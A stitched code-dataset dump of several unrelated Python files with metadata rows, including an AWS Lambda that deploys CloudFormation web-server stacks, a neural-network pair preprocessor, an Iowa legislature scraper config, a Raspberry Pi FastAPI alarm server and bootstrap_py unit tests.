key=lambda image: image["CreationDate"],
reverse=True
)
latest_image = sorted_images[0]
return latest_image["ImageId"]
def find_in_outputs(outputs, key_to_find):
output_string = None
for output in outputs:
if (output['OutputKey'] == key_to_find):
output_string = output['OutputValue']
break
return output_string
def get_password_from_ssm(parameter_name, region):
client = boto3.client('ssm', region_name=region)
logger.debug("Getting pwd from SSM parameter store.")
value = client.get_parameter(
Name=parameter_name,
WithDecryption=True
)
return value['Parameter']['Value']
def deploy_web_servers(event):
logger.debug("Running function deploy_web_servers")
try:
region = event['region_name']
cfn_region = event['cfn_region']
bucket = event['cfn_bucket']
key_prefix = event['folder']
except Exception:
region = os.environ.get('AWS_REGION', AWS_REGION)
cfn_region = os.environ.get('AWS_REGION', AWS_REGION)
bucket = "arc327-well-architected-for-reliability",
key_prefix = "/"
# Create CloudFormation client
client = boto3.client('cloudformation', region)
# Get the S3 bucket the boot script is in, and the object to retrieve and the image to display
boot_bucket = event['boot_bucket']
boot_prefix = event['boot_prefix']
if 'boot_object' in event:
boot_object = event['boot_object']
else:
boot_object = None
websiteimage = event['websiteimage']
# Get the outputs of the VPC stack
vpc_stack = event['vpc']['stackname']
try:
stack_response = client.describe_stacks(StackName=vpc_stack)
stack_list = stack_response['Stacks']
if (len(stack_list) < 1):
logger.debug("Cannot find stack named " + vpc_stack + ", so cannot parse outputs as inputs")
sys.exit(1)
except Exception:
logger.debug("Cannot find stack named " + vpc_stack + ", so cannot parse outputs as inputs")
sys.exit(1)
vpc_outputs = stack_list[0]['Outputs']
try:
workshop_name = event['workshop']
except Exception:
logger.debug("Unexpected error!\n Stack Trace:", traceback.format_exc())
workshop_name = 'UnknownWorkshop'
# Create the list of subnets to pass
igw_subnets = find_in_outputs(vpc_outputs, 'IGWSubnets')
private_subnets = find_in_outputs(vpc_outputs, 'PrivateSubnets')
# Get the VPC
vpcid = find_in_outputs(vpc_outputs, 'VPC')
# Get the list of security groups to pass
elb_sg = find_in_outputs(vpc_outputs, 'WebELBSecurityGroup')
web_sg = find_in_outputs(vpc_outputs, 'WebSecurityGroup')
bastion_sg = find_in_outputs(vpc_outputs, 'BastionSecurityGroup')
webserver_sg_list = web_sg + ',' + bastion_sg
# Run in zones a, b, and c
azs = region + "a," + region + "b," + region + "c"
# Get the latest AMI
latest_ami = find_latest_ami_name(region, "HVM64")
# Get the outputs of the RDS stack
rds_stack = event['rds']['stackname']
try:
stack_response = client.describe_stacks(StackName=rds_stack)
stack_list = stack_response['Stacks']
if (len(stack_list) < 1):
logger.debug("Cannot find stack named " + rds_stack + ", so cannot parse outputs as inputs")
sys.exit(1)
except Exception:
logger.debug("Cannot find stack named " + rds_stack + ", so cannot parse outputs as inputs")
sys.exit(1)
try:
workshop_name = event['workshop']
except Exception:
workshop_name = 'UnknownWorkshop'
rds_outputs = stack_list[0]['Outputs']
# Get the hostname of the RDS host
rds_host = find_in_outputs(rds_outputs, 'DBAddress')
rds_password = get_password_from_ssm(workshop_name, region)
# Prepare the stack parameters
webserver_parameters = []
webserver_parameters.append({'ParameterKey': 'VPCID', 'ParameterValue': vpcid, 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'WebServerSecurityGroups', 'ParameterValue': webserver_sg_list, 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'WebLoadBalancerSG', 'ParameterValue': elb_sg, 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'WebLoadBalancerSubnets', 'ParameterValue': igw_subnets, 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'WebServerSubnets', 'ParameterValue': private_subnets, 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'WebServerInstanceType', 'ParameterValue': 't2.micro', 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'WebServerAMI', 'ParameterValue': latest_ami, 'UsePreviousValue': False})
webserver_parameters.append({'ParameterKey': 'AvailabilityZones', 'ParameterValue': azs, 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'BootBucketRegion', 'ParameterValue': cfn_region, 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'BootBucket', 'ParameterValue': boot_bucket, 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'BootPrefix', 'ParameterValue': boot_prefix, 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'WebSiteImage', 'ParameterValue': websiteimage, 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'RDSHostName', 'ParameterValue': rds_host, 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'RDSUser', 'ParameterValue': 'admin', 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'RDSPassword', 'ParameterValue': rds_password, 'UsePreviousValue': False})
# If Boot Object is supplied then use it, otherwise CloudFormation template will use Parameter default
if boot_object is not None:
webserver_parameters.append({'ParameterKey': 'BootObject', 'ParameterValue': boot_object, 'UsePreviousValue': True})
stack_tags = []
stack_tags.append({'Key': 'Workshop', 'Value': 'AWSWellArchitectedReliability' + workshop_name})
capabilities = []
capabilities.append('CAPABILITY_NAMED_IAM')
web_template_s3_url = "https://s3." + cfn_region + ".amazonaws.com/" + bucket + "/" + key_prefix + "web_server_autoscaling.json"
client.create_stack(
StackName=stackname,
TemplateURL=web_template_s3_url,
Parameters=webserver_parameters,
DisableRollback=False,
TimeoutInMinutes=10,
Capabilities=capabilities,
Tags=stack_tags
)
return_dict = {'stackname': stackname}
return return_dict
def check_stack(region, stack_name):
# Create CloudFormation client
logger.debug("Running function check_stack in region " + region)
logger.debug("Running function check_stack on stack " + stack_name)
client = boto3.client('cloudformation', region)
# See if you can retrieve the stack
try:
stack_response = client.describe_stacks(StackName=stack_name)
stack_list = stack_response['Stacks']
if (len(stack_list) < 1):
logger.debug("No Stack named " + stack_name)
return False
logger.debug("Found stack named " + stack_name)
logger.debug("Status: " + stack_list[0]['StackStatus'])
return True
except ClientError as e:
# If the exception is that it doesn't exist, then check the client error before returning a value
if (e.response['Error']['Code'] == 'ValidationError'):
return False
else:
logger.debug("Stack will not be created: Unexpected exception found looking for stack named " + stack_name)
logger.debug("Client error:" + str(e.response))
return True
except Exception:
logger.debug("Stack will not be created: Unexpected exception found looking for stack named " + stack_name)
print("Stack Trace:", traceback.format_exc())
return True
def status_complete(status):
return status == 'UPDATE_COMPLETE' or status == 'CREATE_COMPLETE' or status == 'UPDATE_ROLLBACK_COMPLETE'
def lambda_handler(event, context):
try:
global logger
logger = init_logging()
logger = set_log_level(logger, os.environ.get('log_level', event['log_level']))
logger.debug("Running function lambda_handler")
logger.info('event:')
logger.info(json.dumps(event))
if (context != 0):
logger.info('context.log_stream_name:' + context.log_stream_name)
logger.info('context.log_group_name:' + context.log_group_name)
logger.info('context.aws_request_id:' + context.aws_request_id)
else:
logger.info("No Context Object!")
process_global_vars()
# Check to see if the previous stack was actually created
vpc_stack_status = event['vpc']['status']
if (status_complete(vpc_stack_status)):
rds_stack_status = event['rds']['status']
if (status_complete(rds_stack_status)):
if not check_stack(event['region_name'], stackname):
logger.debug("Stack " + stackname + " doesn't exist; creating")
return deploy_web_servers(event)
else:
logger.debug("Stack " + stackname + " exists")
return_dict = {'stackname': stackname}
return return_dict
else:
logger.debug("RDS Stack was not completely created: status = " + rds_stack_status)
sys.exit(1)
else:
logger.debug("VPC Stack was not completely created: status = " + vpc_stack_status)
sys.exit(1)
except SystemExit:
logger.error("Exiting")
sys.exit(1)
except ValueError:
exit(1)
except Exception:
print("Unexpected error!\n Stack Trace:", traceback.format_exc())
exit(0)
if __name__ == "__main__":
logger = init_logging()
event = {
'vpc': {
'stackname': 'ResiliencyVPC',
'status': 'CREATE_COMPLETE'
},
'rds': {
'stackname': 'MySQLforResiliencyTesting',
'status': 'CREATE_COMPLETE'
},
'log_level': 'DEBUG',
'region_name': 'ap-northeast-2',
'cfn_region': 'us-east-2',
'cfn_bucket': 'aws-well-architected-labs-ohio',
'folder': 'Reliability/',
'boot_bucket': 'aws-well-architected-labs-ohio',
'boot_prefix': 'Reliability/',
'boot_object': 'bootstrapARC327.sh',
'websiteimage': 'https://s3.us-east-2.amazonaws.com/arc327-well-architected-for-reliability/Cirque_of_the_Towers.jpg',
'workshop': 'LondonSummit'
}
os.environ['log_level'] = os.environ.get('log_level', event['log_level'])
logger = setup_local_logging(logger, os.environ['log_level'])
# Add default level of debug for local execution
lambda_handler(event, 0)
| 39.800546
| 139
| 0.674126
| 1,697
| 14,567
| 5.608132
| 0.226282
| 0.023117
| 0.04203
| 0.062204
| 0.341284
| 0.281917
| 0.166334
| 0.129873
| 0.097089
| 0.088894
| 0
| 0.00848
| 0.214732
| 14,567
| 365
| 140
| 39.909589
| 0.823499
| 0.125283
| 0
| 0.276364
| 0
| 0.003636
| 0.278101
| 0.038177
| 0
| 0
| 0
| 0
| 0.014545
| 1
| 0.04
| false
| 0.010909
| 0.029091
| 0.003636
| 0.123636
| 0.010909
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7b17163e98fca69e6d9d2a2ecd44f5b5e78cfd5c
| 6,095
|
py
|
Python
|
Coursework 2/nn_preprocess.py
|
martinferianc/Pattern-Recognition-EIE4
|
412d437582b236dadd81c0621935f6b3bd5dbad5
|
[
"MIT"
] | 1
|
2019-08-20T11:17:56.000Z
|
2019-08-20T11:17:56.000Z
|
Coursework 2/nn_preprocess.py
|
martinferianc/Pattern-Recognition-EIE4
|
412d437582b236dadd81c0621935f6b3bd5dbad5
|
[
"MIT"
] | null | null | null |
Coursework 2/nn_preprocess.py
|
martinferianc/Pattern-Recognition-EIE4
|
412d437582b236dadd81c0621935f6b3bd5dbad5
|
[
"MIT"
] | null | null | null |
import numpy as np
# For file manipulation and locating
import os
# For the progress bar
from tqdm import tqdm
# To create a deep copy of the data
import copy
# To load the pre-processed and split data
from pre_process import load_data as ld
# For normalization of the samples
from sklearn.preprocessing import normalize
# We define some constant that we reuse
PROCESSED_DIR = "data/processed/"
def save_data(data, file_path, name):
"""
Saves the data
given the name and
the file path
Parameters
----------
data: numpy matrix
Data matrix with features
file_path: str
File path where the file should be saved
name: str
Specific name of the given file
"""
np.save(file_path + "{}.npy".format(name),data)
def preprocess(X, Y, size = 100000,lower_bound=0, upper_bound = 7368,samples = 10, same_class=0.4, different = 0.5, penalty = 10, same_class_penalty=1):
"""
Preprocessed the dataset
It creates two lists X,Y
It randomly chooses a sample from the input list
and then that sample is repeated in total * samples time
For each repeated sample it finds a portion of
images corresponding to different labels,
images corresponding to the same class and
a certain portion of identities
based on the class membership a penalty is applied or not
Parameters
----------
X: numpy array of features
Numpy array of features from which the pairs are created
Y: numpy array
Numpy array of corresponding labels
Returns
-------
X_selected: numpy array
Numpy array of the first input in the pairs
Y_selected: numpy array
Numpy array of the second input in the pairs
values: numpy array
Artificially determined distances
"""
X = normalize(X, axis=1)
N,F = X.shape
X_selected = []
Y_selected = []
values = []
C = int(samples*same_class)
D = int(samples*different)
selected_i = []
for i in tqdm(range(int(size/samples))):
# Randomly select a sample but do not repeat it with respect ot previous samples
random_i = np.random.randint(lower_bound,upper_bound)
while random_i in selected_i:
random_i = np.random.randint(lower_bound,upper_bound)
selected_i.append(random_i)
C_counter = 0
D_counter = 0
offset = 0
# Add samples which correspond to different label than the original image
selected_j = []
while D_counter<D:
random_j = np.random.randint(lower_bound,upper_bound)
while random_j in selected_j:
random_j = np.random.randint(lower_bound,upper_bound)
if Y[random_i] != Y[random_j]:
D_counter+=1
offset+=1
X_selected.append(copy.deepcopy(X[random_i]))
Y_selected.append(copy.deepcopy(X[random_j]))
values.append(penalty)
selected_j.append(random_j)
# Add samples which correspond to the same class
selected_j = []
while C_counter<C:
low = 0
high = N
if random_i-10>lower_bound:
low = random_i-10
if random_i+10<upper_bound:
high = random_i+10
random_j = np.random.randint(lower_bound,upper_bound)
while random_j in selected_j:
random_j = np.random.randint(lower_bound,upper_bound)
if Y[random_i] == Y[random_j] and random_i!=random_j:
C_counter+=1
offset +=1
X_selected.append(copy.deepcopy(X[random_i]))
Y_selected.append(copy.deepcopy(X[random_j]))
values.append(same_class_penalty)
selected_j.append(random_j)
# Fill in the rest with identities
while offset < samples:
X_selected.append(copy.deepcopy(X[random_i]))
Y_selected.append(copy.deepcopy(X[random_i]))
offset+=1
values.append(0)
indeces = np.random.choice(size, size=size, replace=False)
X_selected = np.array(X_selected)
Y_selected = np.array(Y_selected)
values = np.array(values)
return [X_selected[indeces], Y_selected[indeces], values[indeces]]
def load_data(retrain=False):
"""
Load the cached data or call preprocess()
to generate new data
Parameters
----------
None
Returns
-------
all_data: list
* All the data split into lists of [features, labels]
"""
all_data = ld(False)
training_data = all_data[0]
Y = training_data[1]
X = training_data[0]
if retrain is True:
print("Generating new data...")
X_train, Y_train, values_train = preprocess(X,Y, 40000, 0, 6379,samples = 10, same_class=0.4, different = 0.5, penalty = 1,same_class_penalty=0)
X_validation, Y_validation, values_validation = preprocess(X,Y, 7500, 6380,samples = 10, same_class=0.2, different = 0.7, penalty = 1, same_class_penalty=0)
save_data(X_train,PROCESSED_DIR,"training_nn_X")
save_data(Y_train,PROCESSED_DIR,"training_nn_Y")
save_data(values_train,PROCESSED_DIR,"training_nn_values")
save_data(X_validation,PROCESSED_DIR,"validation_nn_X")
save_data(Y_validation,PROCESSED_DIR,"validation_nn_Y")
save_data(values_validation,PROCESSED_DIR,"validation_nn_values")
return [X_train, Y_train, values_train, X_validation, Y_validation, values_validation]
else:
print("Loading data...")
data = []
data.append(np.load(PROCESSED_DIR + "training_nn_X.npy"))
data.append(np.load(PROCESSED_DIR + "training_nn_Y.npy"))
data.append(np.load(PROCESSED_DIR + "training_nn_values.npy"))
data.append(np.load(PROCESSED_DIR + "validation_nn_X.npy"))
data.append(np.load(PROCESSED_DIR + "validation_nn_Y.npy"))
data.append(np.load(PROCESSED_DIR + "validation_nn_values.npy"))
return data
if __name__ == '__main__':
load_data(retrain=True)
| 33.674033
| 164
| 0.642986
| 847
| 6,095
| 4.42621
| 0.217237
| 0.028007
| 0.024006
| 0.032009
| 0.421179
| 0.327287
| 0.267805
| 0.249933
| 0.240331
| 0.157109
| 0
| 0.01701
| 0.26694
| 6,095
| 180
| 165
| 33.861111
| 0.822068
| 0.263495
| 0
| 0.212766
| 0
| 0
| 0.06509
| 0.01077
| 0
| 0
| 0
| 0
| 0
| 1
| 0.031915
| false
| 0
| 0.06383
| 0
| 0.12766
| 0.021277
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7b180f7965af3a7127ae86b77bf7384badafe436
| 776
|
py
|
Python
|
src/main.py
|
M10han/image-scores
|
509e2e9f9d3a484631a97a2e025849c266f71c43
|
[
"MIT"
] | null | null | null |
src/main.py
|
M10han/image-scores
|
509e2e9f9d3a484631a97a2e025849c266f71c43
|
[
"MIT"
] | 1
|
2021-06-08T21:41:19.000Z
|
2021-06-08T21:41:19.000Z
|
src/main.py
|
M10han/image-scores
|
509e2e9f9d3a484631a97a2e025849c266f71c43
|
[
"MIT"
] | null | null | null |
import pandas as pd
import time
from image_matcher import read_image, bjorn_score
def main(data_location='../data/', data_file='input.csv'):
df = pd.read_csv(data_location + data_file)
score_list, runtime_list = [], []
for idx, row in df.iterrows():
image1_file, image2_file = data_location + \
row.image1, data_location + row.image2
image1 = read_image(image1_file)
image2 = read_image(image2_file)
start = time.time()
score = bjorn_score(image1, image2)
end = time.time()
score_list.append(score)
runtime_list.append(f"{end-start:9f}")
df['similar'] = score_list
df['elapsed'] = runtime_list
df.to_csv('output.csv', index=False)
if __name__ == "__main__":
main()
| 26.758621
| 58
| 0.643041
| 104
| 776
| 4.490385
| 0.394231
| 0.102784
| 0.068522
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.018487
| 0.233247
| 776
| 28
| 59
| 27.714286
| 0.766387
| 0
| 0
| 0
| 0
| 0
| 0.081186
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047619
| false
| 0
| 0.142857
| 0
| 0.190476
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7b1bfc88d4da28ede06e1a7e0dc3ba09c6ec9cb9
| 3,081
|
py
|
Python
|
openstates/openstates-master/openstates/ia/__init__.py
|
Jgorsick/Advocacy_Angular
|
8906af3ba729b2303880f319d52bce0d6595764c
|
[
"CC-BY-4.0"
] | null | null | null |
openstates/openstates-master/openstates/ia/__init__.py
|
Jgorsick/Advocacy_Angular
|
8906af3ba729b2303880f319d52bce0d6595764c
|
[
"CC-BY-4.0"
] | null | null | null |
openstates/openstates-master/openstates/ia/__init__.py
|
Jgorsick/Advocacy_Angular
|
8906af3ba729b2303880f319d52bce0d6595764c
|
[
"CC-BY-4.0"
] | null | null | null |
import re
import datetime
import lxml.html
import requests
from billy.utils.fulltext import text_after_line_numbers
from .bills import IABillScraper
from .legislators import IALegislatorScraper
from .events import IAEventScraper
from .votes import IAVoteScraper
# Silencing unverified HTTPS request warnings.
requests.packages.urllib3.disable_warnings()
settings = dict(SCRAPELIB_TIMEOUT=240)
metadata = dict(
name = 'Iowa',
abbreviation = 'ia',
capitol_timezone = 'America/Chicago',
legislature_name = 'Iowa General Assembly',
legislature_url = 'https://www.legis.iowa.gov/',
chambers = {
'upper': {'name': 'Senate', 'title': 'Senator'},
'lower': {'name': 'House', 'title': 'Representative'},
},
terms = [
{
'name': '2011-2012',
'start_year': 2011,
'end_year': 2012,
'sessions': ['2011-2012'],
},
{
'name': '2013-2014',
'start_year': 2013,
'end_year': 2014,
'sessions': ['2013-2014'],
},
{
'name': '2015-2016',
'start_year': 2015,
'end_year': 2016,
'sessions': ['2015-2016'],
},
],
session_details = {
'2011-2012': {
'display_name': '2011-2012 Regular Session',
'_scraped_name': 'General Assembly: 84',
'number': '84',
'start_date': datetime.date(2011, 1, 10),
'end_date': datetime.date(2013, 1, 13),
},
'2013-2014': {
'display_name': '2013-2014 Regular Session',
'_scraped_name': 'General Assembly: 85',
'number': '85',
},
'2015-2016': {
'display_name': '2015-2016 Regular Session',
'_scraped_name': 'General Assembly: 86',
'number': '86',
},
},
feature_flags = ['events', 'influenceexplorer'],
_ignored_scraped_sessions = [
'Legislative Assembly: 86',
'General Assembly: 83',
'General Assembly: 82',
'General Assembly: 81',
'General Assembly: 80',
'General Assembly: 79',
'General Assembly: 79',
'General Assembly: 78',
'General Assembly: 78',
'General Assembly: 77',
'General Assembly: 77',
'General Assembly: 76',
]
)
def session_list():
def url_xpath(url, path):
doc = lxml.html.fromstring(requests.get(url, verify=False).text)
return doc.xpath(path)
sessions = url_xpath(
'https://www.legis.iowa.gov/legislation/findLegislation',
"//section[@class='grid_6']//li/a/text()[normalize-space()]"
)
sessions = [x[0] for x in filter(lambda x: x != [], [
re.findall(r'^.*Assembly: [0-9]+', session)
for session in sessions
])]
return sessions
def extract_text(doc, data):
doc = lxml.html.fromstring(data)
text = doc.xpath('//pre')[0].text_content()
# strip two sets of line numbers
return text_after_line_numbers(text_after_line_numbers(text))
| 29.066038
| 72
| 0.563778
| 320
| 3,081
| 5.296875
| 0.415625
| 0.132743
| 0.023009
| 0.035398
| 0.189381
| 0.070796
| 0
| 0
| 0
| 0
| 0
| 0.08196
| 0.291139
| 3,081
| 105
| 73
| 29.342857
| 0.694139
| 0.024343
| 0
| 0.064516
| 0
| 0
| 0.318015
| 0.019314
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032258
| false
| 0
| 0.096774
| 0
| 0.16129
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7b204556097cfdfd3ff88e8d7bc8bf1337b3e12c
| 660
|
py
|
Python
|
server/main.py
|
DarthBenro008/gh-release-paniker
|
757845b1eebef9d2219c88706fd4277f4261391f
|
[
"MIT"
] | 5
|
2021-12-08T06:37:33.000Z
|
2021-12-20T17:17:18.000Z
|
server/main.py
|
DarthBenro008/gh-release-paniker
|
757845b1eebef9d2219c88706fd4277f4261391f
|
[
"MIT"
] | null | null | null |
server/main.py
|
DarthBenro008/gh-release-paniker
|
757845b1eebef9d2219c88706fd4277f4261391f
|
[
"MIT"
] | null | null | null |
from typing import Optional
from fastapi import FastAPI
app = FastAPI()
import RPi.GPIO as GPIO
import time
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
LED=21
BUZZER=23
GPIO.setup(LED,GPIO.OUT)
def panikMode():
print("Entering PanikMode")
GPIO.output(LED,GPIO.HIGH)
GPIO.output(BUZZER,GPIO.HIGH)
def stopPanikMode():
print("Exiting PanikMode")
GPIO.output(LED,GPIO.LOW)
GPIO.output(BUZZER,GPIO.LOW)
@app.get("/")
def read_root():
return {"ping": "pong"}
@app.get("/stop")
def stopPanik():
stopPanik()
return {"paniking": "false"}
@app.get("/panik")
def panik():
panikMode()
return {"paniking": True}
| 16.5
| 33
| 0.672727
| 89
| 660
| 4.977528
| 0.449438
| 0.090293
| 0.085779
| 0.099323
| 0.117381
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007286
| 0.168182
| 660
| 40
| 34
| 16.5
| 0.799636
| 0
| 0
| 0
| 0
| 0
| 0.114977
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.172414
| false
| 0
| 0.137931
| 0.034483
| 0.413793
| 0.068966
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7b20674499d7148c6a6ca240f5128fad607757fd
| 8,656
|
py
|
Python
|
virtual/lib/python3.10/site-packages/bootstrap_py/tests/test_package.py
|
alex-mu/Moringa-blog
|
430ab9c1f43f2f0066369433ac3f60c41a51a01c
|
[
"MIT"
] | null | null | null |
virtual/lib/python3.10/site-packages/bootstrap_py/tests/test_package.py
|
alex-mu/Moringa-blog
|
430ab9c1f43f2f0066369433ac3f60c41a51a01c
|
[
"MIT"
] | 7
|
2021-03-30T14:10:56.000Z
|
2022-03-12T00:43:13.000Z
|
virtual/lib/python3.6/site-packages/bootstrap_py/tests/test_package.py
|
sarahsindet/pitch
|
c7a4256e19c9a250b6d88d085699a34f508eb86b
|
[
"Unlicense",
"MIT"
] | 1
|
2021-08-19T06:07:23.000Z
|
2021-08-19T06:07:23.000Z
|
# -*- coding: utf-8 -*-
"""bootstrap_py.tests.test_package."""
import unittest
import os
import shutil
import tempfile
from glob import glob
from datetime import datetime
from mock import patch
from bootstrap_py import package
from bootstrap_py.tests.stub import stub_request_metadata
# pylint: disable=too-few-public-methods
class Dummy:
"""Dummy class."""
class PackageDataTests(unittest.TestCase):
"""bootstrap_py.package.PackageData tests."""
def setUp(self):
"""Prepare test data."""
self.params = Dummy()
setattr(self.params, 'foo', 'hoge')
setattr(self.params, 'bar', 'moge')
setattr(self.params, 'baz', 'fuga')
self.default_params = Dummy()
setattr(self.default_params, 'date', '2016-01-29')
setattr(self.default_params, 'version', '1.0.0')
setattr(self.default_params, 'description', 'dummy description.')
self.metadata = stub_request_metadata()
def test_provides_params(self):
"""provides params without default params."""
pkg_data = package.PackageData(self.params)
# pylint: disable=no-member
self.assertEqual(pkg_data.foo, 'hoge')
self.assertEqual(pkg_data.bar, 'moge')
self.assertEqual(pkg_data.baz, 'fuga')
self.assertEqual(pkg_data.date, datetime.utcnow().strftime('%Y-%m-%d'))
self.assertEqual(pkg_data.version, '0.1.0')
# pylint: disable=fixme
self.assertEqual(pkg_data.description, '##### ToDo: Rewrite me #####')
def test_provides_default_params(self):
"""provides params without default params."""
pkg_data = package.PackageData(self.default_params)
# pylint: disable=no-member
self.assertEqual(pkg_data.date, '2016-01-29')
self.assertEqual(pkg_data.version, '1.0.0')
self.assertEqual(pkg_data.description, 'dummy description.')
def test_convert_to_dict(self):
"""convert PackageData to dict."""
dict_data = package.PackageData(self.default_params).to_dict()
# pylint: disable=no-member
self.assertEqual(dict_data.get('date'), '2016-01-29')
self.assertEqual(dict_data.get('version'), '1.0.0')
self.assertEqual(dict_data.get('description'), 'dummy description.')
class PackageTreeTests(unittest.TestCase):
"""bootstrap.package.PackageTree tests."""
def setUp(self):
"""Prepare test data."""
self.cwd = os.getcwd()
self.testdir = tempfile.mkdtemp(suffix='-bootstrap-py-test')
params = Dummy()
setattr(params, 'name', 'foo')
setattr(params, 'author', 'Alice')
setattr(params, 'email', 'alice@example.org')
setattr(params, 'url', 'https://example.org/foo')
setattr(params, 'license', 'gplv3')
setattr(params, 'outdir', self.testdir)
setattr(params, 'with_samples', True)
stub_request_metadata()
self.pkg_data = package.PackageData(params)
self.pkg_tree = package.PackageTree(self.pkg_data)
def tearDown(self):
os.chdir(self.cwd)
shutil.rmtree(self.testdir)
if os.path.isdir(self.pkg_tree.tmpdir):
self.pkg_tree.clean()
def test_initialize(self):
"""initialize PackageTree."""
self.assertEqual(self.pkg_tree.name, 'foo')
self.assertEqual(self.pkg_tree.outdir, self.testdir)
self.assertTrue(os.path.isdir(self.pkg_tree.tmpdir))
self.assertEqual(len(self.pkg_tree.templates.list_templates()), 18)
self.assertEqual(self.pkg_tree.pkg_data, self.pkg_data)
def test_init_py(self):
"""convert __init__.py path."""
self.assertEqual(getattr(self.pkg_tree, '_init_py')('foo/bar'),
os.path.join(self.pkg_tree.tmpdir,
'foo/bar/__init__.py'))
def test_tmpl_path(self):
"""convert tmplate path."""
self.assertEqual(getattr(self.pkg_tree, '_tmpl_path')('foo.py.j2'),
os.path.join(self.pkg_tree.tmpdir,
'foo.py'))
def test_generate_dirs(self):
"""generate directories."""
getattr(self.pkg_tree, '_generate_dirs')()
os.chdir(self.pkg_tree.tmpdir)
self.assertTrue(os.path.isdir(self.pkg_tree.pkg_data.module_name))
self.assertTrue(os.path.isdir(
os.path.join(self.pkg_tree.pkg_data.module_name,
'tests')))
self.assertTrue(os.path.isdir('utils'))
self.assertTrue(os.path.isdir('docs/source/modules'))
def test_list_module_dirs(self):
"""list module directories."""
self.assertEqual(getattr(self.pkg_tree, '_list_module_dirs')(),
['{module_name}', '{module_name}/tests'])
def test_generate_init(self):
"""generate __init__.py."""
getattr(self.pkg_tree, '_generate_dirs')()
getattr(self.pkg_tree, '_generate_init')()
os.chdir(self.pkg_tree.tmpdir)
self.assertTrue(os.path.isfile('foo/__init__.py'))
self.assertTrue(os.path.isfile('foo/tests/__init__.py'))
def test_generate_files(self):
"""generate files."""
getattr(self.pkg_tree, '_generate_dirs')()
getattr(self.pkg_tree, '_generate_files')()
os.chdir(self.pkg_tree.tmpdir)
self.assertEqual(len([i for i in glob('./*')
if os.path.isfile(i)]), 6)
self.assertEqual(len([i for i in glob('./.*')
if os.path.isfile(i)]), 5)
self.assertEqual(len([i for i in glob('utils/*')
if os.path.isfile(i)]), 1)
self.assertEqual(len([i for i in glob('docs/source/*')
if os.path.isfile(i)]), 3)
self.assertEqual(len([i for i in glob('docs/source/modules/*')
if os.path.isfile(i)]), 1)
def test_generate_files_samples(self):
"""generate files."""
self.pkg_data.with_samples = True
getattr(self.pkg_tree, '_generate_dirs')()
getattr(self.pkg_tree, '_generate_files')()
os.chdir(self.pkg_tree.tmpdir)
self.assertEqual(len([i for i in glob('./*')
if os.path.isfile(i)]), 6)
self.assertEqual(len([i for i in glob('./.*')
if os.path.isfile(i)]), 5)
self.assertEqual(len([i for i in glob('foo/*')
if os.path.isfile(i)]), 2)
self.assertEqual(len([i for i in glob('foo/tests/*')
if os.path.isfile(i)]), 2)
self.assertEqual(len([i for i in glob('utils/*')
if os.path.isfile(i)]), 1)
self.assertEqual(len([i for i in glob('docs/source/*')
if os.path.isfile(i)]), 3)
self.assertEqual(len([i for i in glob('docs/source/modules/*')
if os.path.isfile(i)]), 1)
def test_move(self):
"""move source directory to destination directory."""
self.pkg_tree.move()
self.assertFalse(os.path.isdir(self.pkg_tree.tmpdir))
self.assertTrue(os.path.isdir(self.testdir))
@patch('subprocess.call')
def test_generate(self, _mock):
"""generate directories, and files."""
popen_mock = _mock.return_value
popen_mock.wait = None
popen_mock.call = None
self.pkg_tree.generate()
os.chdir(self.pkg_tree.tmpdir)
self.assertTrue(os.path.isdir(self.pkg_tree.name))
self.assertTrue(os.path.isdir(os.path.join(self.pkg_tree.name,
'tests')))
self.assertTrue(os.path.isdir('utils'))
self.assertTrue(os.path.isdir('docs/source/modules'))
self.assertTrue(os.path.isfile('foo/__init__.py'))
self.assertTrue(os.path.isfile('foo/tests/__init__.py'))
self.assertEqual(len([i for i in glob('./*')
if os.path.isfile(i)]), 6)
self.assertEqual(len([i for i in glob('./.*')
if os.path.isfile(i)]), 5)
